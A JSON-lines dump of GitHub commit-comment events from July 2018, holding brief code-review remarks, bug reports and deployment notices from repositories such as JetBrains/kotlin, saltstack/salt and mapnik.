{"id":"7906600516","type":"CommitCommentEvent","actor":{"login":"pratikkapasi"},"repo":{"name":"utk-spartan/pincode_api"},"payload":{"comment":{"id":29566404,"position":20,"line":20,"path":"database/migrations/2018_06_29_054413_create_pincode_state_tables.php","commit_id":"581769eb2aadc69d4b6266814bf62e1b9ec0c5ee","created_at":"2018-07-02T13:15:16Z","updated_at":"2018-07-02T13:15:16Z","author_association":"NONE","body":"line break not required"}},"created_at":"2018-07-02T13:15:16Z"}
{"id":"7906602124","type":"CommitCommentEvent","actor":{"login":"digitalshopping"},"repo":{"name":"rstormsf/multisender"},"payload":{"comment":{"id":29566407,"position":null,"line":null,"path":null,"commit_id":"7f371b15cac37d3da87fe07568be39353c539463","created_at":"2018-07-02T13:15:30Z","updated_at":"2018-07-02T13:15:30Z","author_association":"NONE","body":"Thanks for your reply, i know that it can handle 6000 addresses but the gas\nfee is very high, it shows 28 ETH. To send 5000 token to 6000 address, it\nshouldn't cost more than 1ETH - 2ETH. I attached some file for more clarity.\ni will appreciate if you can look into this and assist me on it. Thanks.\n\nOn Mon, Jul 2, 2018 at 4:45 AM Roman Storm <notifications@github.com> wrote:\n\n> just use the Dapp - it can handle 5000 addresses\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/rstormsf/multisender/commit/7f371b15cac37d3da87fe07568be39353c539463#commitcomment-29560850>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Ams6klPq0sF5CzzD03VZ8uV09lBaaGywks5uCZdHgaJpZM4U-ZY5>\n> .\n>\n"}},"created_at":"2018-07-02T13:15:30Z"}
{"id":"7906602664","type":"CommitCommentEvent","actor":{"login":"sushantpande"},"repo":{"name":"dharaneeshvrd/platform-deployment-manager"},"payload":{"comment":{"id":29566410,"position":57,"line":57,"path":"api/src/main/resources/plugins_summary/sparkStreaming.py","commit_id":"f2f2420d8d708c0f1377c23f4f504613b71d7cc2","created_at":"2018-07-02T13:15:36Z","updated_at":"2018-07-02T13:15:36Z","author_association":"NONE","body":"I think this should be spark_jobs and not spark_jobs.txt"}},"created_at":"2018-07-02T13:15:36Z"}
{"id":"7906603046","type":"CommitCommentEvent","actor":{"login":"ptatian"},"repo":{"name":"NeighborhoodInfoDC/Requests"},"payload":{"comment":{"id":29566411,"position":321,"line":321,"path":"Prog/2018/Washington region feature/tenure by household income.sas","commit_id":"d7f15f728e7e57576d151f045fd979e22a1e0b2c","created_at":"2018-07-02T13:15:40Z","updated_at":"2018-07-02T13:15:40Z","author_association":"CONTRIBUTOR","body":":+1: "}},"created_at":"2018-07-02T13:15:40Z"}
{"id":"7906603990","type":"CommitCommentEvent","actor":{"login":"Crisspl"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29566418,"position":56,"line":97,"path":"ext/Blur/CBlurPerformer.cpp","commit_id":"0f65b17c49a815b52e827ebccadfc7b47ca5428c","created_at":"2018-07-02T13:15:51Z","updated_at":"2018-07-02T13:15:51Z","author_association":"OWNER","body":"glsl compiler doesn't do that since iteration count is constant?"}},"created_at":"2018-07-02T13:15:51Z"}
{"id":"7906604443","type":"CommitCommentEvent","actor":{"login":"bestorw01"},"repo":{"name":"bestorw01/pixel_art_maker"},"payload":{"comment":{"id":29566420,"position":2,"line":2,"path":"README.md","commit_id":"b1f616bd70de359fa4fd16d085f532efed23ba44","created_at":"2018-07-02T13:15:56Z","updated_at":"2018-07-02T13:15:56Z","author_association":"OWNER","body":"https://bestorw01.github.io/pixel_art_maker/"}},"created_at":"2018-07-02T13:15:56Z"}
{"id":"7906606306","type":"CommitCommentEvent","actor":{"login":"artemp"},"repo":{"name":"mapnik/mapnik"},"payload":{"comment":{"id":29566426,"position":null,"line":null,"path":null,"commit_id":"3433397c30461729183e1d1d0bc3a26dafba2875","created_at":"2018-07-02T13:16:16Z","updated_at":"2018-07-02T13:16:16Z","author_association":"MEMBER","body":"Yep, updates tests ^ and https://github.com/mapnik/mapnik/commit/9d44a73ad0576de0145b08f2c707469bc4133176 \r\nhttps://github.com/mapnik/mapnik/commit/2977688a8a28bc94f59ccaa23af3c443a5fc1cdb\r\nFixes single quoted strings with escaped chars. \r\n/cc @lightmare "}},"created_at":"2018-07-02T13:16:16Z"}
{"id":"7906608872","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29566434,"position":57,"line":206,"path":"core/reflection.jvm/src/kotlin/reflect/jvm/internal/RuntimeTypeMapper.kt","commit_id":"1d9ff4b672d4c20abde55efcc1d342399018ac8f","created_at":"2018-07-02T13:16:42Z","updated_at":"2018-07-02T13:16:42Z","author_association":"MEMBER","body":"Maybe, it's worth leaving the assertion as is and adding another enum entry checking that function is built-in"}},"created_at":"2018-07-02T13:16:42Z"}
{"id":"7906610893","type":"CommitCommentEvent","actor":{"login":"ptatian"},"repo":{"name":"NeighborhoodInfoDC/Requests"},"payload":{"comment":{"id":29566437,"position":10,"line":10,"path":"Prog/2018/Washington region feature/Household income.sas","commit_id":"d7f15f728e7e57576d151f045fd979e22a1e0b2c","created_at":"2018-07-02T13:17:04Z","updated_at":"2018-07-02T13:17:04Z","author_association":"CONTRIBUTOR","body":"@lhendey I would add brief description of the program. "}},"created_at":"2018-07-02T13:17:04Z"}
{"id":"7906613014","type":"CommitCommentEvent","actor":{"login":"tcbrindle"},"repo":{"name":"tcbrindle/NanoRange"},"payload":{"comment":{"id":29566442,"position":null,"line":null,"path":null,"commit_id":"95038e595ef5f1cb04e225d6715ed49ae6fb9063","created_at":"2018-07-02T13:17:27Z","updated_at":"2018-07-02T13:17:27Z","author_association":"OWNER","body":"@CaseyCarter  That makes sense, thanks. This is another case where my concepts-as-boolean-variable-templates approach has problems, because `enable_if` doesn't short-circuit, so the \"not-same-as\" guard doesn't prevent the other constraints from being evaluated.\r\n\r\nI'm going to have to give some thought as to how to fix this properly (I wish variable templates could be used as template template parameters, it would make things much easier...)"}},"created_at":"2018-07-02T13:17:27Z"}
{"id":"7906616766","type":"CommitCommentEvent","actor":{"login":"raizocn"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29566458,"position":null,"line":null,"path":null,"commit_id":"18e3335975e801ec617713b8d1539c27137b1b12","created_at":"2018-07-02T13:18:05Z","updated_at":"2018-07-02T13:18:05Z","author_association":"NONE","body":"😥"}},"created_at":"2018-07-02T13:18:05Z"}
{"id":"7906617136","type":"CommitCommentEvent","actor":{"login":"MZcoder"},"repo":{"name":"MZcoder/MZcoder.github.io"},"payload":{"comment":{"id":29566459,"position":null,"line":null,"path":null,"commit_id":"b24d4b2e5f6aada096ab6135a3d35f52b3bf6dd7","created_at":"2018-07-02T13:18:10Z","updated_at":"2018-07-02T13:18:10Z","author_association":"OWNER","body":"Nice\r\n"}},"created_at":"2018-07-02T13:18:10Z"}
{"id":"7906617730","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire-jlibtorrent"},"payload":{"comment":{"id":29566460,"position":null,"line":null,"path":null,"commit_id":"e8e89dd7b7cc0b669d88535f366a57401632af82","created_at":"2018-07-02T13:18:16Z","updated_at":"2018-07-02T13:18:16Z","author_association":"COLLABORATOR","body":"yesssss!\r\n\r\nFunny I never saw this crash on android, but it happens every time I start a download on desktop"}},"created_at":"2018-07-02T13:18:16Z"}
{"id":"7906619742","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29566464,"position":9,"line":9,"path":"compiler/testData/codegen/box/reflection/functions/enumValuesValueOf.kt","commit_id":"1d9ff4b672d4c20abde55efcc1d342399018ac8f","created_at":"2018-07-02T13:18:37Z","updated_at":"2018-07-02T13:18:37Z","author_association":"MEMBER","body":"I'd check `getOrDefault`, `MutableList::removeAt` and `Collection::contains` with \"specialized\" signature"}},"created_at":"2018-07-02T13:18:37Z"}
{"id":"7906621587","type":"CommitCommentEvent","actor":{"login":"aeranghang"},"repo":{"name":"dataitgirls2/TWL"},"payload":{"comment":{"id":29566469,"position":48,"line":80,"path":"Dalbongjooin/D+3_0702","commit_id":"5550a28f685158f42dbb37e1ecca5d643161bc23","created_at":"2018-07-02T13:18:56Z","updated_at":"2018-07-02T13:18:56Z","author_association":"CONTRIBUTOR","body":"부연: ERP(Enterprise Resource Planning) 시스템은 회사가 가지고 있는 자산들(직원용 컴퓨터, 각종 사무실 집기 등)을 효과적으로 관리하기 위한 시스템입니다. BI(Business Intelligence) 시스템은 회사 내의 각종 데이터를 \"의사결정에 참고하기 좋은 형태로\" 보여주는 시스템입니다. ERP에서 관리되는 데이터는 종종 BI 시스템에서 활용되기도 합니다."}},"created_at":"2018-07-02T13:18:56Z"}
{"id":"7906622153","type":"CommitCommentEvent","actor":{"login":"sushantpande"},"repo":{"name":"dharaneeshvrd/platform-deployment-manager"},"payload":{"comment":{"id":29566470,"position":25,"line":25,"path":"api/src/main/resources/plugins_summary/yarn_connection.py","commit_id":"f2f2420d8d708c0f1377c23f4f504613b71d7cc2","created_at":"2018-07-02T13:19:03Z","updated_at":"2018-07-02T13:19:03Z","author_association":"NONE","body":"please take care of prints."}},"created_at":"2018-07-02T13:19:03Z"}
{"id":"7906622825","type":"CommitCommentEvent","actor":{"login":"joschi"},"repo":{"name":"dropwizard/dropwizard"},"payload":{"comment":{"id":29566473,"position":null,"line":null,"path":null,"commit_id":"97cef36208e9a4bd43e305e5cb451d5af014dc4e","created_at":"2018-07-02T13:19:10Z","updated_at":"2018-07-02T13:19:10Z","author_association":"MEMBER","body":"Refs #2421"}},"created_at":"2018-07-02T13:19:10Z"}
{"id":"7906624045","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29566479,"position":9,"line":9,"path":"compiler/testData/codegen/box/reflection/builtins/enumNameOrdinal.kt","commit_id":"1d9ff4b672d4c20abde55efcc1d342399018ac8f","created_at":"2018-07-02T13:19:24Z","updated_at":"2018-07-02T13:19:24Z","author_association":"MEMBER","body":"What is the line for?"}},"created_at":"2018-07-02T13:19:24Z"}
{"id":"7906625863","type":"CommitCommentEvent","actor":{"login":"mnukala30"},"repo":{"name":"mnukala30/DemoRepo"},"payload":{"comment":{"id":29566481,"position":null,"line":null,"path":null,"commit_id":"bf0234926eb9c353cd3d6ea44708ca1972ccfa1c","created_at":"2018-07-02T13:19:44Z","updated_at":"2018-07-02T13:19:44Z","author_association":"OWNER","body":"Ok. Please commit the changes"}},"created_at":"2018-07-02T13:19:44Z"}
{"id":"7906626195","type":"CommitCommentEvent","actor":{"login":"MZcoder"},"repo":{"name":"MZcoder/MZcoder.github.io"},"payload":{"comment":{"id":29566483,"position":null,"line":null,"path":null,"commit_id":"b24d4b2e5f6aada096ab6135a3d35f52b3bf6dd7","created_at":"2018-07-02T13:19:48Z","updated_at":"2018-07-02T13:19:48Z","author_association":"OWNER","body":"Very Good **Project** MZcoder😉"}},"created_at":"2018-07-02T13:19:48Z"}
{"id":"7906626985","type":"CommitCommentEvent","actor":{"login":"cristinapauna"},"repo":{"name":"saltstack/salt"},"payload":{"comment":{"id":29566485,"position":null,"line":null,"path":null,"commit_id":"cd051f0f4b9270d7fb1fa8631a0778445e4b0c0c","created_at":"2018-07-02T13:19:55Z","updated_at":"2018-07-02T13:19:55Z","author_association":"NONE","body":"Kind request to port this fix to 2016.11.9 version."}},"created_at":"2018-07-02T13:19:55Z"}
{"id":"7906628900","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29566489,"position":9,"line":9,"path":"compiler/testData/codegen/box/reflection/builtins/enumNameOrdinal.kt","commit_id":"1d9ff4b672d4c20abde55efcc1d342399018ac8f","created_at":"2018-07-02T13:20:17Z","updated_at":"2018-07-02T13:20:17Z","author_association":"MEMBER","body":"Oh, it's probably checks we don't fail why loading members"}},"created_at":"2018-07-02T13:20:17Z"}
{"id":"7906634899","type":"CommitCommentEvent","actor":{"login":"ptatian"},"repo":{"name":"NeighborhoodInfoDC/Requests"},"payload":{"comment":{"id":29566508,"position":33,"line":33,"path":"Prog/2018/Washington region feature/Household income.sas","commit_id":"d7f15f728e7e57576d151f045fd979e22a1e0b2c","created_at":"2018-07-02T13:21:20Z","updated_at":"2018-07-02T13:21:20Z","author_association":"CONTRIBUTOR","body":"@lhendey For output destinations, if you replace **D:\\DCDATA\\Libraries\\\\** with **&_dcdata_default_path\\\\**, and enclose the entire path in double quotes (\"), then the output will automatically be directed to either D: or L: drive, depending on where the program is submitted. Eg,\r\n\r\n`outfile=\"&_dcdata_default_path\\Requests\\Prog\\2018\\Washington region feature\\ACS_msa_hhinc_2016.csv\"`"}},"created_at":"2018-07-02T13:21:20Z"}
{"id":"7906634928","type":"CommitCommentEvent","actor":{"login":"roelsmeets"},"repo":{"name":"roelsmeets/character-networks"},"payload":{"comment":{"id":29566509,"position":null,"line":null,"path":null,"commit_id":"59c7123c5d0f3209787e91281707a5be2e50d799","created_at":"2018-07-02T13:21:20Z","updated_at":"2018-07-02T13:21:20Z","author_association":"OWNER","body":"@EricSanders kun jij eens kijken of je het probleem hier ziet. Met deze momenteel uitgecommentarieerde line of code kan wel weighted degree berekend worden:\r\n\r\ndegree_dict = self.Graph.degree(self.Graph.nodes(),weight='weight') \r\n\r\nMaar dan gooit deze line of code een Error:\r\n\r\nsorted_degree = sorted(degree_dict.items(), key=itemgetter(1), reverse=True) # Sort dictionary of degrees\r\n\r\nDat heeft te maken met dat degree_dict in dat geval niet meer  .items() als attribuut kan hebben."}},"created_at":"2018-07-02T13:21:20Z"}
{"id":"7906635120","type":"CommitCommentEvent","actor":{"login":"godo13405"},"repo":{"name":"godo13405/dragon-spellbook"},"payload":{"comment":{"id":29566511,"position":null,"line":null,"path":null,"commit_id":"dd595d9ed566e89f59ec31dba9e756587e1294cf","created_at":"2018-07-02T13:21:22Z","updated_at":"2018-07-02T13:21:22Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/48c4c854-767b-47f7-b2ec-7f79e14cf35d?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/7ddab936-a781-49fa-99fc-742d790aea96?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\") deployed [dragon-spellbook](https://github.com/godo13405/dragon-spellbook/releases/tag/deploy-ibm-yp-eu-gb-UXCalibur-prod-20180702-132120 \"deploy-ibm-yp-eu-gb-UXCalibur-prod-20180702-132120\") to [prod](https://console.bluemix.net/apps/aaffb021-5482-4ff5-bc14-26c90db6686c?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:UXCalibur:prod\"), including this commit"}},"created_at":"2018-07-02T13:21:22Z"}
{"id":"7906636130","type":"CommitCommentEvent","actor":{"login":"gemmellr"},"repo":{"name":"vert-x3/vertx-proton"},"payload":{"comment":{"id":29566512,"position":8,"line":331,"path":"src/main/java/io/vertx/proton/ProtonLink.java","commit_id":"35eeb59f82bf8f95d7e7a6b1b0d8a296ede09f2a","created_at":"2018-07-02T13:21:31Z","updated_at":"2018-07-02T13:21:31Z","author_association":"CONTRIBUTOR","body":"It isn't an internal method. It also isn't as simple as just calling it when close() is invoked, as the behaviour needed differs depending on whether it is at a client or server and whether you begin the closure or the peer does, and whether you are doing any of the advanced things from the protocol that it facilitates. It might be possible to add some 'autoFree' (in the style of autoAccept, autoSettle etc) behaviour but its not something I'd be comfortable trying to add at this stage for 3.6.0."}},"created_at":"2018-07-02T13:21:31Z"}
{"id":"7906637116","type":"CommitCommentEvent","actor":{"login":"SteveEbey73742"},"repo":{"name":"wine-staging/wine-staging"},"payload":{"comment":{"id":29566517,"position":null,"line":null,"path":null,"commit_id":"19db07f062fdf4c486f78e3201544f5cf5ac7f02","created_at":"2018-07-02T13:21:42Z","updated_at":"2018-07-02T13:21:42Z","author_association":"NONE","body":"after renaming the folders, so that it was back to the way it should be, on my system the compile failed, so here is the config.log from the wine64-build attempt.\r\n[config.log](https://github.com/wine-staging/wine-staging/files/2155382/config.log)\r\n"}},"created_at":"2018-07-02T13:21:42Z"}
{"id":"7906639059","type":"CommitCommentEvent","actor":{"login":"ilonazakharova"},"repo":{"name":"ilonazakharova/javabasics25"},"payload":{"comment":{"id":29566523,"position":null,"line":null,"path":null,"commit_id":"824387b0ddf67bd37c743846204a3e71b9e7ee51","created_at":"2018-07-02T13:22:01Z","updated_at":"2018-07-02T13:22:01Z","author_association":"OWNER","body":"После добавления конструктора этот класс будет выглядеть так:\r\npackage ru.stqa.pft.sandbox;\r\n\r\npublic class Fraction {\r\n                               //задаю атрибуты дроби\r\n public double numerator;     //числитель\r\n public double denominator;  //знаменатель\r\n\r\n\r\n  //создаем конструктор (имя конструктора должно совпадать с именем класса,\r\n  // и не имеет никакого возвращаемого значения, тип данных не указывается перед названием конструктора)\r\n  //конструктор как функция может принимать параметры\r\n  public Fraction (double numerator, double denominator){\r\n   this.numerator = numerator; //используем ключевое слово this - это ссылка на объект\r\n   this.denominator = denominator;\r\n\r\n   //1 numerator - атрибут\r\n    //2 numerator - переменная, которая объявлена как аргумент функции\r\n  }\r\n}\r\n"}},"created_at":"2018-07-02T13:22:01Z"}
{"id":"7906644632","type":"CommitCommentEvent","actor":{"login":"sushantpande"},"repo":{"name":"dharaneeshvrd/platform-deployment-manager"},"payload":{"comment":{"id":29566543,"position":21,"line":21,"path":"api/src/main/resources/plugins_summary/oozie.py","commit_id":"f2f2420d8d708c0f1377c23f4f504613b71d7cc2","created_at":"2018-07-02T13:22:58Z","updated_at":"2018-07-02T13:22:58Z","author_association":"NONE","body":"This statement is same as line #12."}},"created_at":"2018-07-02T13:22:58Z"}
{"id":"7906646041","type":"CommitCommentEvent","actor":{"login":"godo13405"},"repo":{"name":"godo13405/dragon-spellbook"},"payload":{"comment":{"id":29566547,"position":null,"line":null,"path":null,"commit_id":"2ecb23df87e18cc266be791cadfa3c9463e9bfeb","created_at":"2018-07-02T13:23:13Z","updated_at":"2018-07-02T13:23:13Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/48c4c854-767b-47f7-b2ec-7f79e14cf35d?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/7ddab936-a781-49fa-99fc-742d790aea96?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\") deployed [dragon-spellbook](https://github.com/godo13405/dragon-spellbook/releases/tag/deploy-ibm-yp-eu-gb-UXCalibur-prod-20180702-132305 \"deploy-ibm-yp-eu-gb-UXCalibur-prod-20180702-132305\") to [prod](https://console.bluemix.net/apps/aaffb021-5482-4ff5-bc14-26c90db6686c?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:UXCalibur:prod\"), including this commit"}},"created_at":"2018-07-02T13:23:13Z"}
{"id":"7906646373","type":"CommitCommentEvent","actor":{"login":"allenwakeup"},"repo":{"name":"davidcava/shadowsocks-libev-dsm"},"payload":{"comment":{"id":29566548,"position":null,"line":null,"path":null,"commit_id":"9a2b727c8128d8432ba756304b09ba1621a0cffd","created_at":"2018-07-02T13:23:15Z","updated_at":"2018-07-02T13:23:15Z","author_association":"NONE","body":"Hi, first to be here, and I tested my model DS212J this night, but failed.\r\nI installed the spk file manually and then created ss-local.json which is under folder /var/packages/shadowsocks-libev/etc .\r\napparently, ss-local.json has been configured just like what I had done in my Ubuntu 16.04.\r\nubuntu 16.04 conf works, but ss-local failed to start\r\n\r\nhere's DSM 6.2 error message:\r\n```\r\nStartup of shadowsocks-libev ss-local failed for config file /var/packages/shadowsocks-libev/etc/ss-local.json\r\nNothing started: check config file(s) ss-(local|server|redir|tunnel)[-].json in: /var/packages/shadowsocks-libev/etc\r\n```\r\n\r\nso, What I missed?"}},"created_at":"2018-07-02T13:23:15Z"}
{"id":"7906653934","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29566555,"position":9,"line":9,"path":"compiler/testData/codegen/box/reflection/functions/enumValuesValueOf.kt","commit_id":"1d9ff4b672d4c20abde55efcc1d342399018ac8f","created_at":"2018-07-02T13:24:34Z","updated_at":"2018-07-02T13:24:34Z","author_association":"MEMBER","body":"Probably it's worth adding a test on setter, too"}},"created_at":"2018-07-02T13:24:34Z"}
{"id":"7906675025","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29566619,"position":57,"line":206,"path":"core/reflection.jvm/src/kotlin/reflect/jvm/internal/RuntimeTypeMapper.kt","commit_id":"1d9ff4b672d4c20abde55efcc1d342399018ac8f","created_at":"2018-07-02T13:28:15Z","updated_at":"2018-07-02T13:28:15Z","author_association":"MEMBER","body":"OK. I'll also add `DescriptorFactory.isEnum{Values,ValueOf}Method` then, and use it here"}},"created_at":"2018-07-02T13:28:15Z"}
{"id":"7906676631","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566626,"position":1,"line":19,"path":"commonlibrary/src/main/java/com/axway/ats/common/filesystem/snapshot/equality/FileSystemEqualityState.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T13:28:33Z","updated_at":"2018-07-02T13:28:33Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T13:28:33Z"}
{"id":"7906679551","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29566630,"position":9,"line":9,"path":"compiler/testData/codegen/box/reflection/builtins/enumNameOrdinal.kt","commit_id":"1d9ff4b672d4c20abde55efcc1d342399018ac8f","created_at":"2018-07-02T13:29:01Z","updated_at":"2018-07-02T13:29:01Z","author_association":"MEMBER","body":"Yes. I'll add an assert on the size of the returned list"}},"created_at":"2018-07-02T13:29:01Z"}
{"id":"7906682021","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566636,"position":1,"line":23,"path":"corelibrary/src/main/java/com/axway/ats/core/atsconfig/AtsInfrastructureManager.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T13:29:25Z","updated_at":"2018-07-02T13:29:25Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T13:29:25Z"}
{"id":"7906684761","type":"CommitCommentEvent","actor":{"login":"claudiobadii"},"repo":{"name":"termux/termux-root-packages"},"payload":{"comment":{"id":29566640,"position":null,"line":null,"path":null,"commit_id":"ac6aaaf8c5622d247c00ef6d0f536ac1e054b238","created_at":"2018-07-02T13:29:53Z","updated_at":"2018-07-02T13:29:53Z","author_association":"NONE","body":"The command without -keys does not work for me:\r\n\r\napt-key adv --keyserver pgp.mit.edu --recv-keys A46BE53C"}},"created_at":"2018-07-02T13:29:53Z"}
{"id":"7906691170","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566652,"position":1,"line":15,"path":"corelibrary/src/main/java/com/axway/ats/core/atsconfig/model/AbstractApplicationController.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T13:30:57Z","updated_at":"2018-07-02T13:30:57Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T13:30:57Z"}
{"id":"7906691808","type":"CommitCommentEvent","actor":{"login":"aeranghang"},"repo":{"name":"dataitgirls2/TWL"},"payload":{"comment":{"id":29566653,"position":43,"line":43,"path":"20180702_honeybeat1.md","commit_id":"3fd50d0da2494e0ca1ea6f090d3efa0cf6ef801b","created_at":"2018-07-02T13:31:03Z","updated_at":"2018-07-02T13:31:03Z","author_association":"CONTRIBUTOR","body":"😄 "}},"created_at":"2018-07-02T13:31:03Z"}
{"id":"7906692890","type":"CommitCommentEvent","actor":{"login":"sushantpande"},"repo":{"name":"dharaneeshvrd/platform-deployment-manager"},"payload":{"comment":{"id":29566658,"position":30,"line":30,"path":"api/src/main/resources/base_summary.py","commit_id":"f2f2420d8d708c0f1377c23f4f504613b71d7cc2","created_at":"2018-07-02T13:31:14Z","updated_at":"2018-07-02T13:31:14Z","author_association":"NONE","body":"Pass temp_comp_status extracted in line 22 to this function. No need to extract this again."}},"created_at":"2018-07-02T13:31:14Z"}
{"id":"7906693742","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566660,"position":2,"line":16,"path":"corelibrary/src/main/java/com/axway/ats/core/atsconfig/model/AgentController.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T13:31:22Z","updated_at":"2018-07-02T13:31:22Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T13:31:22Z"}
{"id":"7906694732","type":"CommitCommentEvent","actor":{"login":"fenguoerbian"},"repo":{"name":"sffxzzp/Steam-2018-SummerGame"},"payload":{"comment":{"id":29566664,"position":null,"line":null,"path":null,"commit_id":"f634d900090bb66482a7b5b70150efd335f5facf","created_at":"2018-07-02T13:31:32Z","updated_at":"2018-07-02T13:31:32Z","author_association":"NONE","body":"这个commit牛逼！"}},"created_at":"2018-07-02T13:31:32Z"}
{"id":"7906696712","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566678,"position":1,"line":18,"path":"corelibrary/src/main/java/com/axway/ats/core/atsconfig/model/ApplicationController.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T13:31:52Z","updated_at":"2018-07-02T13:31:52Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T13:31:52Z"}
{"id":"7906697980","type":"CommitCommentEvent","actor":{"login":"godo13405"},"repo":{"name":"godo13405/dragon-spellbook"},"payload":{"comment":{"id":29566683,"position":null,"line":null,"path":null,"commit_id":"d6b4e36036f25db53cc7185b86a65029638c4322","created_at":"2018-07-02T13:32:06Z","updated_at":"2018-07-02T13:32:06Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/48c4c854-767b-47f7-b2ec-7f79e14cf35d?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/7ddab936-a781-49fa-99fc-742d790aea96?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\") deployed [dragon-spellbook](https://github.com/godo13405/dragon-spellbook/releases/tag/deploy-ibm-yp-eu-gb-UXCalibur-prod-20180702-133205 \"deploy-ibm-yp-eu-gb-UXCalibur-prod-20180702-133205\") to [prod](https://console.bluemix.net/apps/aaffb021-5482-4ff5-bc14-26c90db6686c?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:UXCalibur:prod\"), including this commit"}},"created_at":"2018-07-02T13:32:06Z"}
{"id":"7906700908","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29566698,"position":1,"line":42,"path":"corelibrary/src/main/java/com/axway/ats/core/dbaccess/DatabaseProviderFactory.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T13:32:37Z","updated_at":"2018-07-02T13:32:37Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T13:32:37Z"}
{"id":"7906702767","type":"CommitCommentEvent","actor":{"login":"jrmarino"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29566701,"position":null,"line":null,"path":null,"commit_id":"280e1c5536b2dce33558cd019d32bc9cefca05a6","created_at":"2018-07-02T13:32:57Z","updated_at":"2018-07-02T13:32:57Z","author_association":"OWNER","body":"looks like it's version 4.14 that supports gtk3.  As soon as it's out, I'd like to move xfce to gtk3 only and drop libwnck-legacy (assuming this is the only reason the port exists).  And are we sure the latest libwnck isn't backwards compatible??"}},"created_at":"2018-07-02T13:32:57Z"}
{"id":"7906706063","type":"CommitCommentEvent","actor":{"login":"jacobian"},"repo":{"name":"jacobian/pct"},"payload":{"comment":{"id":29566711,"position":null,"line":null,"path":null,"commit_id":"21313e5daccde1c554a039cf5159fbbe605cc352","created_at":"2018-07-02T13:33:30Z","updated_at":"2018-07-02T13:33:30Z","author_association":"OWNER","body":"Actually, it did. 💻 "}},"created_at":"2018-07-02T13:33:30Z"}
{"id":"7906707095","type":"CommitCommentEvent","actor":{"login":"cristinapauna"},"repo":{"name":"saltstack/salt"},"payload":{"comment":{"id":29566712,"position":null,"line":null,"path":null,"commit_id":"002aa88a97ed8a1c51f4ab1c965d22d064ea30a8","created_at":"2018-07-02T13:33:41Z","updated_at":"2018-07-02T13:33:41Z","author_association":"NONE","body":"Kind request to port this fix to 2016.11.9 version together with https://github.com/saltstack/salt/commit/cd051f0f4b9270d7fb1fa8631a0778445e4b0c0c#diff-7688c5bcce57bec4abce1b1d4d43478e\r\n\r\nBy using C bindings when loading yaml files improves the time it takes to run a salt command with ~20% in our system. See https://jira.opnfv.org/browse/ARMBAND-347"}},"created_at":"2018-07-02T13:33:41Z"}
